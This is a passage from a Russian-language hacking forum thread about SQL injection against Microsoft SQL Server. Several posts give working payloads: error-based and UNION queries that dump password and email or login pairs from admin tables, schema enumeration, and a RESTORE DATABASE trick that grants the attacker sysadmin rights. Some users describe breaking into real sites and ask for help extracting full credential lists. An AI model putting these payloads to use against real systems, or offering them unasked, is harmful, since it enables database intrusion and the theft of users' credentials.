Старый 02.01.2013, 17:19   #21
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

а как можно делать дамп без FOR XML RAW ('a'), нето с ним много мусора в ответе (мсскул эррорбасед) ?
opium вне форума   Ответить с цитированием
Старый 23.01.2013, 17:58   #22
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию Замена LIMIT MSSQL

Сегодня нужно было сделать дамп из MSSQL т.к. LIMIT тут нет и вывод ограничен, исхитрился через ROW_NUMBER() вот так, может кому-то пригодится.
PHP код:
 AND 1=(SELECT CONVERT(int,SUBSTRING((SELECT FROM (SELECT ROW_NUMBER() OVER (ORDER BY email) AS rownum,password%2b':'%2bemail AS data FROM admin.dbo.members) AS t WHERE t.rownum BETWEEN 100 AND 150  FOR XML RAW ('a') ),0,1990))) 
BETWEEN [start] AND [stop]
Про ROW_NUMBER() можно прочесть на сайте разработчиков Майкрософт

Последний раз редактировалось cat1vo; 23.01.2013 в 18:01..
cat1vo вне форума   Ответить с цитированием
Старый 11.04.2013, 16:01   #23
Take_IT
 
Регистрация: 11.03.2013
Сообщений: 4
Репутация: 4
По умолчанию

Есть скуля в mssql

@@version говорит:
Код:
Microsoft SQL Server  2000 - 8.00.760 (Intel X86) 
 Dec 17 2002 14:22:05 
 Copyright (c) 1988-2003 Microsoft Corporation
 Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
выдернул имена таблиц
Код:
' union select null,null,TABLE_NAME,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES -- xx
отметил нужную для себя и вывел из нее колонки
Код:
' union select null,null,COLUMN_NAME,null,null,null,null,null,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Администраторы' -- xx
колонки:
Код:
 	 
Логин	 	 
Пароль	 	 
ФИО
имена таблиц и колонок как вы могли заметить на кириллице, как к ним обратиться чтоб вытащить логин и пароль?
Take_IT вне форума   Ответить с цитированием
Старый 29.04.2013, 13:02   #24
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

довольно симпатичная и толковая презентация MS-SQL Post-exploitation http://mssqlpostexploit.codeplex.com...ses/view/96882 (там презентация в ms PowerPoint, видео и исходники)
DrakonHaSh вне форума   Ответить с цитированием
Старый 07.05.2013, 11:49   #25
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
Если вы не sa, но есть привилегия на CREATE DATABASE, то в RESTORE DATABASE есть внутренняя sql инъекция, найдя (именно так ) которую, можно выполнять запросы с правами sa.

Fix – 2011-11-06
Microsoft SQL Server 2005: no fix planned.
Microsoft SQL Server 2008: apply Service Pack 3.
Microsoft SQL Server 2008 R2: no fix planned.

https://www.teamshatter.com/topics/g...abase-command/
На troopers13 рассказали как эксплуатировать. Проверить, есть ли права CREATE DATABASE:
Код:
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE');
Создаем БД, и бекапим её:
Код:
create database [', 0, 0, 0 exec sp_addsrvrolemember MY_DB_USERNAME, sysadmin--];
backup database [', 0, 0, 0 exec sp_addsrvrolemember MY_DB_USERNAME, sysadmin--] to disk = 'd:\database.bak';
drop database [', 0, 0, 0 exec sp_addsrvrolemember MY_DB_USERNAME, sysadmin--];
Находим этот файл на диске, открываем хекс-редактором, ищем в файле имя БД и меняем код кавычки 0x27 в имени на 0x07.
После чего делаем рестор этого файла:
Код:
declare @tsql as varchar(128) set @tsql = cast(0x7 as nvarchar) + ', 0, 0, 0 exec sp_addsrvrolemember MY_DB_USERNAME, sysadmin--'
RESTORE DATABASE @tsql FROM DISK = 'd:\database.bak';
Как видно, уязвимость очень специфичная, пригодится когда в винде локально есть права какого-нибудь IUSR-blah-blah, а MSSQL работает под LocalSystem, и хочется исполнять команды как sa.

PS Пробовал у себя на MSSQL2005 - не сработало, наверно мешают какие-то локальные настройки.


Небольшая cheatsheet.
SynQ вне форума   Ответить с цитированием
Старый 16.06.2013, 22:55   #26
vikler1
 
Регистрация: 10.06.2013
Сообщений: 6
Репутация: 0
По умолчанию

Простите, что поднимаю пост и могилы. Автору огромнейший респект. Его статья помогла достать мне - такому нубу - всю информацию из бд

Один вопрос: помогите, как сдампить un : pw (весь список) из таблицы? Подскажите нормальный рабочий скрипт или в какую сторону покопать? До этого пару раз делала дамп через sqlmap, но вот этот сайт, который я вручную раскрутила, sqlmap не считает уязвимым и завершает свою работу с negative results... В общем, прошу, помогите советом!
vikler1 вне форума   Ответить с цитированием
Старый 04.03.2015, 08:44   #27
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от cat1vo Посмотреть сообщение
Сегодня нужно было сделать дамп из MSSQL т.к. LIMIT тут нет и вывод ограничен, исхитрился через ROW_NUMBER() вот так, может кому-то пригодится.
PHP код:
 AND 1=(SELECT CONVERT(int,SUBSTRING((SELECT FROM (SELECT ROW_NUMBER() OVER (ORDER BY email) AS rownum,password%2b':'%2bemail AS data FROM admin.dbo.members) AS t WHERE t.rownum BETWEEN 100 AND 150  FOR XML RAW ('a') ),0,1990))) 
BETWEEN [start] AND [stop]
Про ROW_NUMBER() можно прочесть на сайте разработчиков Майкрософт
TOP() короче, если есть возможность.

Тут приходится раскручивать скуль через Error based - case @@version when 1 then 1 end - выводит.
Проблема в том, что нельзя использовать скобки, с ними что-то не так у сервера =(
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Старый 07.03.2015, 02:18   #28
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

пафосных мажоров error-based вариант, если можем грамотно закрыть префикс и постфикс, но нет кавычек ( то есть for xml path не канает)
Цитата:
DECLARE @o VARCHAR(2000);
SET @o = convert(varchar,0x0a);
SELECT @o = @o + login + convert(varchar,0x3a) + password + convert(varchar,0x0a) FROM [tablename];
Select convert(int,@o);
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot